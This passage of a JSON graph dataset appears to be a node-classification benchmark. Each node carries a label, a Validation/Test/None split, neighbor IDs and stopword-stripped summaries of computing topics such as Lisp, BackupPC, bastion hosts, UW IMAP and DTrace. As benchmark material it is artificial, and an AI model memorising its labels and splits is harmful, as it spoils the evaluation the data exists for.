      8501,
      11063,
      2361,
      5948,
      6972,
      7998,
      8508,
      4928,
      8514,
      1348,
      5956,
      9541,
      4423,
      10053,
      7497,
      330,
      1866,
      6476,
      8523,
      7505,
      6995,
      9044,
      2901,
      11604,
      344,
      2394,
      6495,
      1376,
      8543,
      1890,
      11618,
      1387,
      10603,
      4465,
      372,
      11125,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5523,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      4024,
      7607,
      8122,
      4030,
      4036,
      3014,
      1480,
      3529,
      466,
      5078,
      2008,
      1499,
      1502,
      5090,
      995,
      6114,
      1000,
      2536,
      6633,
      9707,
      9710,
      6639,
      10734,
      11247,
      9714,
      499,
      4596,
      508,
      11261,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11488,
    "label": 9,
    "text": "List_of_Lisp-family_programming_languages:list lisp-family programming languages functional programming language lisp second-oldest high-level programming language direct descendants closely related dialects still widespread use today language fortran older one year lisp like fortran changed lot since early days many dialects existed history today widely known general-purpose lisp dialects common lisp scheme",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      9780,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      9330,
      5751,
      7805,
      11390,
      1159,
      9865,
      6797,
      9875,
      9877,
      5803,
      2225,
      4786,
      6840,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      10981,
      11495,
      4846,
      8430,
      5360,
      5361,
      5872,
      8435,
      9969,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      10510,
      5395,
      9492,
      1301,
      8474,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      11083,
      3408,
      6994,
      11604,
      1365,
      2392,
      10083,
      6502,
      11625,
      5492,
      3446,
      3960,
      377,
      4474,
      10104,
      4992,
      3462,
      10630,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      9151,
      7616,
      5569,
      6594,
      10690,
      4550,
      5064,
      11218,
      10712,
      3034,
      3051,
      5611,
      7670,
      11255
    ],
    "mask": "Test"
  },
  {
    "node_id": 11489,
    "label": 2,
    "text": "TSX-Plus:tsx-plus tsx-plus multi-user operating system pdp-11/lsi-11 series computers developed h computer systems inc. based dec rt-11 single-user real-time operating system tsx-plus installs top rt-11 system highly configurable tunable due constraints memory management system pdp-11/lsi-11 entire operating system core must occupy 40 kibibytes memory maximum possible 4 mebibytes physical memory actually installed machines mandated 22-bit address space despite limitations tsx-plus actually able service 30 simultaneous users still maintaining decent response times although usually never used 8 simultaneous users software included wp package named lex-11 spreadsheet saturn software machine slowed considerably 8 students wanted use word-processing package time also decision-table language called ncc manchester worked well tsx plus system popular 1980s although major number clones latest version tsx-plus tcp/ip support system still use supported",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      1147,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      5531,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      9151,
      576,
      11075,
      8388,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      5598,
      2399,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      2811,
      3197,
      1150
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11490,
    "label": 9,
    "text": "Programming_language_specification:programming language specification computing programming language specification standard definition documentation artifact defines programming language users implementors agree programs language mean specifications typically detailed formal primarily used implementors users referring case ambiguity c++ specification frequently cited users instance due complexity related documentation includes programming language reference intended expressly users programming language rationale explains specification written typically informal specification major programming languages specifications languages exist popular decades without specification language may one implementations whose behavior acts de facto standard without behavior documented specification perl perl 5 notable example language without specification php specified 2014 use 20 years language may implemented specified specified implemented may develop together usual practice today implementations specifications provide checks writing specification requires precisely stating behavior implementation implementation checks specification possible practical consistent writing specification implementation largely avoided since algol 68 1968 due unexpected difficulties implementation implementation deferred however languages still occasionally implemented gain popularity without formal specification implementation essential use specification desirable essential informally code talks programming language specification take several forms including following syntax programming language usually described using combination following two components formulating rigorous semantics large complex practical programming language daunting task even experienced specialists resulting specification difficult anyone experts understand following ways programming language semantics described languages use least one description methods languages combine one widely used languages specified using natural language descriptions semantics description usually takes form reference manual language manuals run hundreds pages e.g. print version java language specification 3rd ed 596 pages long imprecision natural language vehicle describing programming language semantics lead problems interpreting specification example semantics java threads specified english later discovered specification provide adequate guidance implementors formal semantics grounded mathematics result precise less ambiguous semantics given natural language however supplemental natural language descriptions semantics often included aid understanding formal definitions example iso standard modula-2 contains formal natural language definition opposing pages programming languages whose semantics described formally reap many benefits example automatic tool support help realize benefits example automated theorem prover theorem checker increase programmer language designer confidence correctness proofs programs language power scalability tools varies widely full formal verification computationally intensive rarely scales beyond programs containing hundred lines may require considerable manual assistance programmer lightweight tools model checkers require fewer resources used programs containing tens thousands lines many compilers apply static type checks program compile reference implementation single implementation programming language designated authoritative behavior implementation held define proper behavior program written language approach several attractive properties first precise requires human interpretation disputes meaning program settled simply executing program reference implementation provided implementation behaves deterministically program hand defining language semantics reference implementation also several potential drawbacks chief among conflates limitations reference implementation properties language example reference implementation bug bug must considered authoritative behavior another drawback programs written language may rely quirks reference implementation hindering portability across different implementations nevertheless several languages successfully used reference implementation approach example perl interpreter considered define authoritative behavior perl programs case perl open-source model software distribution contributed fact nobody ever produced another implementation language issues involved using reference implementation define language semantics moot defining semantics programming language terms test suite involves writing number example programs language describing programs ought behave — perhaps writing correct outputs programs plus outputs called test suite language correct language implementation must produce exactly correct outputs test suite programs chief advantage approach semantic description easy determine whether language implementation passes test suite user simply execute programs test suite compare outputs desired outputs however used test suite approach major drawbacks well example users want run programs part test suite indeed language implementation could run programs test suite would largely useless test suite describe language implementation behave program test suite determining behavior requires extrapolation implementor part different implementors may disagree addition difficult use test suite test behavior intended allowed nondeterministic therefore common practice test suites used combination one language specification techniques natural language description reference implementation examples official draft language specifications",
    "neighbors": [
      2304,
      8582,
      2316,
      9871,
      6558,
      1952,
      428,
      5420,
      5677,
      10049,
      8773,
      8262,
      1611,
      3022,
      10584,
      7394,
      10083,
      8421,
      11625,
      3960,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11491,
    "label": 0,
    "text": "United_Nations_Multilingual_Terminology_Database:united nations multilingual terminology database united nations multilingual terminology database unterm linguistic tool translates terminology nomenclature used within united nations un six official languages un arabic chinese english french russian spanish database contains 85,000 words updated daily database maintained terminology reference section documentation division department general assembly conference management headquarters new york city database put internet order facilitate understanding work un public access intranet un secretariat",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 11492,
    "label": 4,
    "text": "BackupPC:backuppc backuppc free disk-to-disk backup software suite web-based frontend cross-platform server run linux solaris unix-based server client necessary server client several protocols handled services native client os 2007 backuppc mentioned one three well known open-source backup software even though one tools amazing unfortunately one ever talks many folks never hear data deduplication reduces disk space needed store backups disk pool possible use d2d2t solution archive function backuppc used back disk pool tape backuppc block-level backup system like ghost4linux performs file-based backup restore thus suitable backup disk images raw disk partitions backuppc incorporates server message block smb client used back network shares computers running windows paradoxically setup backuppc server located behind nat 'd firewall windows machine operates public ip address may advisable smb traffic useful web servers running secure shell ssh gnu tar rsync available allows backuppc server stored subnet separate web server dmz published gnu general public license backuppc supports nfs ssh smb rsync back unix-like systems native ssh tar rsync support linux bsd os x well microsoft windows shares minimal configuration windows third party implementations tar rsync ssh cygwin required utilize protocols choice tar rsync dictated hardware bandwidth available client clients backed rsync use considerably cpu time client machines using tar smb clients using smb tar use considerably bandwidth clients using rsync trade-offs inherent differences protocols using tar smb transfers file entirety using little cpu maximum bandwidth rsync method calculates checksums file client server machines way enables transfer differences two files uses cpu resources minimizes bandwidth version 3.x backuppc uses combination hard links compression reduce total disk space used files first full backup files transferred backend optionally compressed compared files identical hard linked uses one additional directory entry upshot astute system administrator could potentially back ten windows xp laptops 10 gb data 8 gb repeated machine office windows binary files would look like 100 gb needed 28 gb 10 × 2 gb 8 gb would used compression data back-end reduce requirement browsing backups incremental backups automatically filled back previous full backup every backup appears full complete set data version 4.x still use v3.x repositories new backups use new format seamless upgrade overall performance higher v3.x version",
    "neighbors": [
      5249,
      5253,
      7685,
      8582,
      6280,
      3988,
      10530,
      10276,
      3366,
      6313,
      1837,
      4398,
      7983,
      9014,
      823,
      9025,
      7364,
      8772,
      4294,
      1358,
      7764,
      11221,
      11610,
      7518,
      10341,
      2281,
      5482,
      5612,
      8941,
      9836,
      3826,
      3837
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11493,
    "label": 9,
    "text": "Harmony_Compiler:harmony compiler harmony compiler written peter samson massachusetts institute technology mit compiler designed encode music pdp-1 built earlier program samson wrote tx-0 computer jack dennis noticed mentioned samson sound state tx-0 speaker could enough play music succeeded building wysiwyg program one voice 1960 pdp-1 arrived mit september 1961 samson designed harmony compiler synthesizes four voices input text-based notation although created music many genres optimized baroque music pdp-1 music merged four channels played back stereo notes pitch undertone music stop errors mistakes greeted message typewriter red ribbon err human forgive divine samson joined pdp-1 restoration project computer history museum 2004 recreate music player",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 11494,
    "label": 2,
    "text": "IDEDOS:idedos idedos rom-based disk operating system written 6502/65816 assembly language commodore 64 128 supercpu main purpose control ata pi devices connected ide64 cartridge present like normal commodore drives additionally supports networked drives pclink built-in machine code monitor file manager c64 kernal uses vector table page 3 allow redirection common kernal file handling basic functions feature used idedos hook c64 kernal operating system divided four pages 16 kib mapped required mapping temporarily switched interrupts running increased compatibility however causes ≈40 μs latency additional ram buffers internal data also mapped either ide64 cartridge 28 kib additional ram supercpu used standard kernal memory locations page zero page two handled kernal-compatible way temporarily used memory restored routines finished beyond kernal table idedos two new calls bulk data handling read/write allows much faster data transfer rates character-based i/o native file system non-cbm style low level allow partitions greater 16 mib high-level features like 16-character filenames filetypes retained due complexity memory requirements filesystem creation consistency check part operating system unlike cbm dos cmd dos additional filesystems like iso 9660 fat abstracted internally mostly use routines handling thereby little difference noticeable user programs except features fully implemented device handling done additional device numbers assigned new devices device numbers idedos devices configurable normally range 10–14 years many programs assumed device 8 allow selecting anything else worked around temporary changing used idedos device number 8 standard devices original kernal routines used idedos devices use custom routines closely imitate results behavior kernal calls floppy devices kernal calls going vector table notably iec bus-specific calls present incompatibility programs using special features like cd-rom audio handling implemented new channel 15 commands features found floppy drives follow cmd style commands allow programs easily support wider range devices unlike intelligent external devices separate processor like 1541 cbmdos idedos runs host computer thereby disk routines block finished rules use irq loaders commonly used speed operation serial bus peripherals interrupts generally allowed idedos running disabled rare time-critical operations however system written non-reentrant like original kernal 1996 idedos born need system run ide64 1.1 card created josef souček main code tomáš přibyl file manager final cartridge monitor adaptation additional code came jan vorlíček basic extension jan hlaváček duart pclink 2000 kajtár zsolt added cdrom support new setup code lot fixes due limitations design development completely rewritten version 0.90 started kajtár zsolt ready general use 2005 meanwhile old version reached 0.898b june 2004 2009 64 kib limit system started get tight idedos 0.91 beta started refactor code gain space internal flexibility last version old idedos series built fast loader supported devices fast load switched setup case incompatibility non-1541 device 8 minimum interleave 7 fast saver supported manager uses interleave 8 pal/ntsc compatible timing custom protocol sequential access supported devices includes clock calendar ability set drive numbers screen colours auto boot floppy fast loader basic clock ti power management write retry read-ahead write cache drive settings cdrom slow option basic extension includes disk handling commands limited idedos devices adds new error messages commands used navigate around directories start programs copy/rename/delete files create directories execute plugins operate files recursive file copy added 0.898b rare cases work monitor almost exactly final cartridge monitor idedos 0.89 standard 6502 opcodes available commands current stable latest version 20100509 patch 45 notable differences 0.89 supported devices device support automatically detected disabled manually needed pal/ntsc compatible timing fast saver file manager custom protocol sequential access supported devices mostly well known standard dos wedge commands basic extension adds disk handling commands used device use cmd style commands file managers inspiration comes 0.89 though rewritten scratch goal file manager supports idedos devices also works well cmd drives monitor rewritten scratch main inspiration ccs64 emulator monitor command ideas came fc3/ar7/vice monitors goal freezer style registers including i/o editable fast machine code monitor supports illegal 6502 supercpu emulation mode opcodes commands still development notable differences 0.90",
    "neighbors": [
      5413,
      8262,
      10533,
      6120,
      2665,
      9549,
      7281,
      7356,
      4563,
      9946,
      4764,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 11495,
    "label": 9,
    "text": "Daniel_Weinreb:daniel weinreb daniel l. weinreb january 6 1959 – september 7 2012 american computer scientist programmer significant work lisp environment weinreb born january 6 1959 brooklyn new york raised parents herbert phyllis weinreb two brothers bill david attended saint ann school weinreb graduated st. ann school brooklyn ny 1975 attended mit 1975–1979 starting age 16 graduating b.s computer science electrical engineering wrote eine text editor mit lisp machine eine made use window system lisp machine thus first emacs written graphical user interface second implementation emacs ever written first implementation emacs lisp notable subsequent emacs implementations used lisp including james gosling gosmacs bernard greenberg multics emacs richard stallman gnu emacs 1979–1980 weinreb worked lawrence livermore national laboratory amber operating system s-1 particularly file system multiprocess scheduler 1980 co-founded symbolics developing software symbolics lisp machine also participated significantly design common lisp programming language one five co-authors original common lisp specification common lisp language first edition worked statice object-oriented database published symbolics 1988 1988 co-founded object design one architects implementors objectstore leading commercial object-oriented database management system object database still commercially maintained available progress software bought object design excelon inc. 2002 joined bea systems operations administration management architect weblogic 2006 joined ita software working airline reservation system 2009 daniel weinreb gave google tech talk use common lisp one implementation languages airline reservation system 2009 chair international lisp conference 2009 cambridge/ma weinreb married cheryl moreau 1986 son adam 1991 dan weinreb died september 7 2012 year-long battle cancer",
    "neighbors": [
      4992,
      4097,
      10752,
      11269,
      3334,
      5751,
      2056,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8993,
      8226,
      4516,
      5031,
      9128,
      5803,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      7880,
      8908,
      1613,
      205,
      11218,
      9299,
      2135,
      10712,
      3034,
      3675,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      7805,
      6502,
      8293,
      2666,
      3051,
      5360,
      5361,
      8435,
      2166,
      3446,
      10104,
      6906,
      4477
    ],
    "mask": "None"
  },
  {
    "node_id": 11496,
    "label": 4,
    "text": "System_high_mode:system high mode system high mode simply system high security mode using automated information system ais pertains environment contains restricted data classified hierarchical scheme top secret secret unclassified system high pertains ia features information processed specifically strength trustworthiness system system high mode distinguished modes multilevel security lack need system contribute protection separation unequal security classifications particular precludes use features objects e.g content format produced exposed ais operating system high mode criteria securely downgrade objects result information system high ais treated classified highest security level data ais example unclassified information exist secret system high computer must treated secret therefore never shared unclassified destinations unless downgraded reliable human review risky lack omniscient humans known technology securely declassify system high information automated means reliable features data trusted potentially corrupted system high host unreliable means used including cross-domain solutions bypass guards serious risk system exploitation via bypass introduced nevertheless done resulting risk overlooked accepted",
    "neighbors": [
      3480,
      10170,
      4067,
      11470
    ],
    "mask": "Test"
  },
  {
    "node_id": 11497,
    "label": 9,
    "text": "SETL:setl setl set language high-level programming language based mathematical theory sets originally developed jack jacob t. schwartz new york university nyu courant institute mathematical sciences late 1960s setl provides two basic aggregate data types unordered sets sequences latter also called tuples elements sets tuples arbitrary type including sets tuples maps provided sets pairs i.e. tuples length 2 arbitrary domain range types primitive operations setl include set membership union intersection power set construction among others setl provides quantified boolean expressions constructed using universal existential quantifiers first-order predicate logic setl provides several iterators produce variety loops aggregate data structures print prime numbers 2 n notation similar list comprehension factorial procedure definition conventional setl expression factorial n 0 1970s setl ported besm-6 es evm russian computer systems setl used early implementation programming language ada named nyu ada/ed translator later became first validated ada implementation certified april 11 1983 according guido van rossum python predecessor abc inspired setl -- lambert meertens spent year setl group nyu coming final abc design set language 2 setl2 backward incompatible descendant setl created kirk snyder courant institute mathematical sciences new york university late 1980s like predecessor based theory notation finite sets also influenced syntax style ada language interactive set language isetl variant setl used discrete mathematics",
    "neighbors": [
      9345,
      4770,
      3076,
      1610,
      1931,
      428,
      8554,
      10670,
      6967
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11498,
    "label": 2,
    "text": "Kernel-Mode_Driver_Framework:kernel-mode driver framework kernel-mode driver framework kmdf driver framework developed microsoft tool aid driver developers create maintain kernel mode device drivers windows 2000 later releases one frameworks included windows driver frameworks current version 1.27 general kmdf supports drivers written windows driver model runs wdm wdm driver model used since advent windows 98 whereas kmdf driver framework microsoft advocates uses windows 2000 beyond general since features like power management plug play handled framework kmdf driver less complicated less code equivalent driver kmdf object-based built top wdm provides object-based perspective wdm following architectural mandate superset wdf functionality contained different types objects kmdf implementation consists",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      6709,
      8246,
      4174,
      4178,
      83,
      9813,
      603,
      608,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      10900,
      10902,
      11414,
      3224,
      3235,
      4771,
      7846,
      2221,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      3303,
      1770,
      3821,
      10991,
      2804,
      6927,
      9491,
      11030,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      315,
      5952,
      1348,
      844,
      847,
      1366,
      10079,
      11616,
      2401,
      2943,
      9609,
      9612,
      7064,
      9114,
      10654,
      8607,
      11683,
      4010,
      10157,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      9205,
      10229,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 11499,
    "label": 3,
    "text": "Intel_BCD_opcode:intel bcd opcode intel bcd opcodes set x86 instructions operates bcd numbers radix used representation numbers x86 processors 2 called binary numeral system however x86 processors limited support decimal numeral system bcd instructions longer supported long mode bcd numbers represented two ways packed decimal unpacked decimal decimal numbers 0 99 added directly first numbers added usual using add adc need carry flag processor set adjust flag sum lower nibbles 16 higher carry flag sum bytes 256 higher result adjusted depending number representation decimal numbers 0 99 subtracted directly first numbers subtracted usual using sub sbb need carry flag processor set adjust flag borrow occurred least significant nibble carry flag borrow occurred significant nibble unpacked representation supported two single digit numbers multiplied first digits multiplied usual using mul result adjusted using aam ascii adjust multiplication processor divides result ten storing quotient integral part significant byte result remainder least significant byte result unpacked representation supported operands must fall range 0 99 first operands converted normal binary representation using aad ascii adjust division processor converts numbers multiplying significant byte 10 adding least significant byte quotient remainder division obtained usual using div present normal binary representation binary-coded decimal bcd numbers past used storing decimal numbers especially financial software opcodes mentioned give x86 rudimentary bcd support adding bcd numbers using opcodes complex task requires many instructions add even modest numbers also require large amount memory integer calculations integer calculations exact radix number representation important accuracy x86 processor calculations binary numbers usually lot faster calculations bcd numbers",
    "neighbors": [
      9158,
      7783,
      1776,
      499,
      372,
      1175,
      1915,
      255
    ],
    "mask": "Test"
  },
  {
    "node_id": 11500,
    "label": 5,
    "text": "UW_IMAP:uw imap uw imap server reference server implementation imap protocol developed university washington mark crispin others uw-imap development began c.1988 2003 uw imap among three popular free software imap server packages two cyrus imap courier imap 2005 point codebase undergone extensive rewriting among top two cyrus imap may 2008 university washington terminated development uw imap 4 august 2008 staff university washington involved developing uw imap pine alpine announced would shift effort direct development consultation coordination role help integrate contributions community wake layoffs university washington technology division c. january august 2009 maintainers debian gnu/linux major downstream distributor uw imap began retire uw imap packages september 2009 mark crispin principal author uw imap announced fork called panda imap crispin passed away late 2012 least one uw imap enthusiast maintains public source code repository containing uw imap panda imap commit history start project crispin final release much 2000s uw imap considered good choice due ready availability inclusion major linux distributions support pop imap ease installation also received praise ease administration compatibility longstanding mailbox formats small size simplicity unlike later imap servers uw imap coupled imap user accounts user accounts server underlying operating system feature together uw imap default use monolithic mailbox files intended ensure compatibility legacy operating systems email management practices drew criticism commentators particular sam varshavchik developer competing courier imap server suggested crispin decision add support maildir popular non-monolithic mailbox format uw imap may stemmed lingering resentment earlier disagreement crispin maildir designer daniel j. bernstein crispin insistence upon retaining uw imap support flat files mail stores criticised maintainers competing citadel imap server causing otherwise unnecessary complexity imap protocol additionally varshavchik noted despite crispin insistence imap servers comply imap specifications uw imap server imap client counterpart pine used private imap extension documented specification uw imap also criticised susceptibility buffer overflows lack privilege separation relative competitors cyrus courier 2007 computer programs existed capable exploiting security vulnerabilities un-patched improperly-configured uw imap installations unreliable ssl support uw imap designed compatible existing legacy mail stores systems plug-and-play installable without requiring site-specific configuration uw imap uses c-client mail engine also used alpine pine e-mail clients c-client supports multiple mail store formats including usenet news spools mix mbox mbx mx mh tenex mtx mmdf phile c-client also includes support imap pop3 nntp smtp internet protocols also bundled uw imap pop2 pop3 servers mailutil utility program dmail tmail mail delivery agents 2005 uw imap codebase consisted 135,000 lines code imap server comprised 4,000 lines c-client comprised rest uw imap officially support maildir format however uw imap patched support formats maildir gluelogic offers patch support maildirs pine patched pine instance used compile uw imap nominal maildir support however yields buggy server correctly distinguish unseen recent messages patch available alpine used similarly fewer drawbacks",
    "neighbors": [
      1474,
      2748,
      5063,
      10248,
      8298,
      76,
      5230,
      10096,
      3218,
      1075,
      9909,
      3350,
      471,
      8344,
      3578,
      412,
      4439,
      8671
    ],
    "mask": "Test"
  },
  {
    "node_id": 11501,
    "label": 2,
    "text": "Sprite_(operating_system):sprite operating system sprite experimental unix-like distributed operating system developed university california berkeley john ousterhout research group 1984 1992 notable features include support single system image computer clusters introduction log-structured filesystem tcl scripting language also originated project early work sprite based idea making operating system network aware thereby time make invisible user primary area work building new network file system made heavy use local client-side caching order improve performance opening file initial reads network used on-demand user actions occur cache similar utilities allow remote devices mapped local computer space allowing network printing similar duties many key unix files based network including things like password file machines network share root directory well common unix utilities codice_1 re-written make network aware well listing people logged across network makes sprite network appear single large time-sharing system single-system image another key addition sprite process migration allows programs moved machines time system maintains list machines state automatically moves processes idle machines improve local performance processes also evicted machines improve performance causing original starter move another machine network take control locally long tasks like compiling sprite system appear fast work early sprite outlined ended around 1987 improved next year starting 1990 sprite used basis development first log-structured file system lfs development continued 1992 lfs dramatically increases performance file writes expense read performance sprite tradeoff particularly useful read access cached anyway—that sprite systems typically perform fewer reads normal unix system lfs-like systems also allow much easier crash recovery became major focus project period additional experimentation striped file systems striped across different machines well clusters drives continued 1994 sprite microkernel system suffers sort problems unixes terms development complexity becoming increasingly difficult develop functionality added 1990s suffering small team supporting project simply able keep rapid changes unix taking place time project slowly shut 1994",
    "neighbors": [
      6787,
      6412,
      5498,
      7187,
      5397,
      1304,
      3487,
      1952,
      3241,
      7983,
      3248,
      2995,
      692,
      9141,
      823,
      9784,
      7483,
      9151,
      3267,
      10436,
      11075,
      8262,
      5452,
      5206,
      6369,
      5873,
      5363,
      5492,
      118,
      2424,
      633,
      3066,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 11502,
    "label": 4,
    "text": "Bastion_host:bastion host bastion host special-purpose computer network specifically designed configured withstand attacks computer generally hosts single application example proxy server services removed limited reduce threat computer hardened manner primarily due location purpose either outside firewall demilitarized zone dmz usually involves access untrusted networks computers term generally attributed 1990 article discussing firewalls marcus j. ranum ranum defined bastion host krutz vines described bastion host computer fully exposed attack public side dmz unprotected firewall filtering router firewalls routers anything provides perimeter access control security considered bastion hosts types bastion hosts include web mail dns ftp servers ... due exposure great deal effort must put designing configuring bastion hosts minimize chances penetration amazon web services aws context bastion host defined server whose purpose provide access private network external network internet exposure potential attack bastion host must minimize chances penetration. aws related definition bastion hosts instances sit within public subnet typically accessed using ssh rdp remote connectivity established bastion host acts ‘ jump ’ server allowing use ssh rdp log instances within private subnets deeper within vpc properly configured use security groups network acls nacls bastion essentially acts bridge private instances via internet two common network configurations include bastion hosts placement first requires two firewalls bastion hosts sitting first outside world firewall inside firewall dmz often smaller networks multiple firewalls one firewall exists network bastion hosts commonly placed outside firewall bastion hosts related multi-homed hosts screened hosts dual-homed host often contains firewall also used host services well screened host dual-homed host dedicated running firewall bastion server also set using proxycommand openssh several examples bastion host systems/services",
    "neighbors": [
      225,
      836,
      7364,
      7812,
      2887,
      5608,
      8998,
      9256,
      939,
      7248,
      4895,
      4725,
      6262,
      6773,
      1208,
      11188,
      3930,
      4287
    ],
    "mask": "None"
  },
  {
    "node_id": 11503,
    "label": 5,
    "text": "PageSpinner:pagespinner pagespinner semi-wysiwyg html editor os x developed optima systems released shareware pagespinner worldscript compliant uses waste text engine carbon library originally released classic mac os ported os x shortly operating system release used jeffrey zeldman 13 years switched textmate version 4.0 released 2002 introduced multiple undo double-byte input support scroll wheel support mac os x version 4.6.3 deemed quirky erratic 2006 reviewer particular macintosh version 5 released 2010 reviewed macworld uk faulted appearance dated found price high features provided reviewer impressed multiple site support integration apache os x standard web server june 2019 optima systems website offline current status pagespinner unknown",
    "neighbors": [
      576,
      6338,
      7785,
      6154,
      4171,
      5612,
      6797,
      7983,
      7346,
      6231,
      119,
      2045,
      10910
    ],
    "mask": "Test"
  },
  {
    "node_id": 11504,
    "label": 4,
    "text": "Nimsoft:nimsoft nimsoft independent company software vendor offered information technology monitoring service desk products services acquired ca inc. 2010 since october 2012 products integrated business nimsoft brand still used ca nimsoft products monitor manage business services specific systems within infrastructure including network components servers databases applications virtualized environments nimsoft products customers monitor systems hosted internal data centers well externally hosted environments including software service saas cloud computing environments nimbus software founded oslo norway 1998 confused nimbus data converse software exclusive us distributor nimbus software founded silicon valley 2002 nimbus software converse software merged 2004 form nimsoft gary read founder us distributor appointed ceo new company headquarters established silicon valley 2007 10.3 million series round funding jmi equity northzone ventures closed nimsoft acquired indicative software april 2008 offer business service management established new research development base fort collins colorado nimsoft received san francisco business times 2008 best place work award nimsoft closed 12 million funding round led goldman sachs october 2008 may 2009 nimsoft acquired intellectual property assets cittio product capabilities included network discovery topology mapping root cause analysis rca utilizing graph theory october nimsoft announced unified monitoring architecture monitor externally hosted systems services including saas cloud computing based infrastructures march 2010 ca inc. announced would acquire nimsoft 350 million nimsoft one hottest silicon valley companies lead411 september 2010 nimsoft extended software support vblock products vce company april 2011 nimsoft announced unified manager software combining monitoring service management enhanced management support netapp storage announced june ca acquired netherlands-based watchmouse july software integrated nimsoft nimsoft ceased exist independent operating unit within ca 2012 although products still offered brand name",
    "neighbors": [
      11233,
      4194,
      467,
      6067
    ],
    "mask": "Test"
  },
  {
    "node_id": 11505,
    "label": 1,
    "text": "Fortify_Software:fortify software fortify software later known fortify inc. california-based software security vendor founded 2003 acquired hewlett-packard 2010 become part hp enterprise security products fortify offerings included static application security testing dynamic application security testing products well products services support software security assurance february 2011 fortify sells fortify ondemand static dynamic application testing service september 7 2016 hpe ceo meg whitman announced software assets hewlett packard enterprise including fortify would merged micro focus create independent company hp enterprise shareholders would retain majority ownership micro focus ceo kevin loosemore called transaction entirely consistent established acquisition strategy focus efficient management mature infrastructure products indicated micro focus intended bring core earnings margin mature assets deal 80 percent total 21 percent today micro focus existing 46 percent level within three years merge concluded september 1 2017 fortify technical advisory board composed avi rubin bill joy david a. wagner fred schneider gary mcgraw greg morrisett li gong marcus ranum matt bishop william pugh john viega fortify created security research group maintained java open review project vulncat taxonomy security vulnerabilities addition security rules fortify analysis software members group wrote book secure coding static analysis published research including javascript hijacking attacking build cross build injection watch write preventing cross-site scripting observing program output dynamic taint propagation finding vulnerabilities without attacking",
    "neighbors": [
      1312,
      7808,
      1316,
      8229,
      1638,
      9031,
      5384,
      11100,
      6765,
      3214,
      2258,
      6773,
      1304,
      1114,
      11067,
      5756
    ],
    "mask": "None"
  },
  {
    "node_id": 11506,
    "label": 2,
    "text": "DTrace:dtrace dtrace comprehensive dynamic tracing framework created sun microsystems troubleshooting kernel application problems production systems real time originally developed solaris since released free common development distribution license cddl opensolaris descendant illumos ported several unix-like systems dtrace used get global overview running system amount memory cpu time filesystem network resources used active processes also provide much fine-grained information log arguments specific function called list processes accessing specific file 2010 oracle corporation acquired sun microsystems announced discontinuing opensolaris community effort core solaris engineers create truly open source solaris illumos operating system announced via webinar thursday 3 august 2010. fork opensolaris os/net consolidation including dtrace technology october 2011 oracle announced porting dtrace linux several years unofficial dtrace port linux available changes licensing terms august 2017 oracle released dtrace kernel code gplv2+ license user space code gplv2 upl licensing september 2018 microsoft announced ported dtrace freebsd windows september 2016 opendtrace effort began github code comprehensive documentation system internals opendtrace effort maintains original cddl licensing code opensolaris additional code contributions coming bsd 2 clause license goal opendtrace provide os agnostic portable implementation dtrace acceptable consumers including macos freebsd openbsd netbsd linux well embedded systems sun microsystems designed dtrace give operational insights allow users tune troubleshoot applications os testers write tracing programs also referred scripts using programming language confused programming languages named language inspired c includes added functions variables specific tracing programs resemble awk programs structure consist list one probes instrumentation points probe associated action probes comparable pointcut aspect-oriented programming whenever condition probe met associated action executed probe fires typical probe might fire certain file opened process started certain line code executed probe fires may analyze run-time situation accessing call stack context variables evaluating expressions print log information record database modify context variables reading writing context variables allows probes pass information allowing cooperatively analyze correlation different events special consideration taken make dtrace safe use production environment example minimal probe effect tracing underway performance impact associated disabled probe important since tens thousands dtrace probes enabled new probes also created dynamically dtrace scripts invoked directly command line providing one probes actions arguments examples dtrace -n 'proc exec-success trace curpsinfo- pr_psargs dtrace -n 'syscall :open* entry printf execname copyinstr arg0 dtrace -n 'syscall entry num execname count dtrace -n 'syscall entry num probefunc count 